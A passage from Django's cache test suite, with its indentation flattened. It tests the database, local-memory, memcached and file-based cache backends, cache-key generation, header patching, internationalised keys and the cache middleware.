def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertIsNone(cache.get("key1"))
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
def test_createcachetable_observes_database_router(self):
old_routers = router.routers
try:
router.routers = [DBCacheRouter()]
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
finally:
router.routers = old_routers
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
        self.assertTrue(os.path.exists(self.dirname))
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class GetCacheTests(IgnoreDeprecationWarningsMixin, TestCase):
def test_simple(self):
from django.core.cache import caches, get_cache
self.assertIsInstance(
caches[DEFAULT_CACHE_ALIAS],
get_cache('default').__class__
)
cache = get_cache(
'django.core.cache.backends.dummy.DummyCache',
**{'TIMEOUT': 120}
)
self.assertEqual(cache.default_timeout, 120)
self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')
def test_close(self):
from django.core import signals
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_deprecated(self):
from django.core.cache import get_cache
from django.core import signals
cache = get_cache('cache.closeable_cache.CacheClass')
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
        del self.DEFAULT_TIMEOUT
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, set(['private'])),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, set(['private'])),
('private', {'public': True}, set(['public'])),
('public', {'public': True}, set(['public'])),
('public', {'private': True}, set(['private'])),
('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])),
('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
        Ensure the constructor correctly distinguishes between CacheMiddleware used as
        middleware vs. used as a view decorator, and sets attributes appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
    Tests various headers with TemplateResponse.
    Most are probably redundant since they manipulate the same object
    anyway, but the ETag header is 'special' because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse).
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
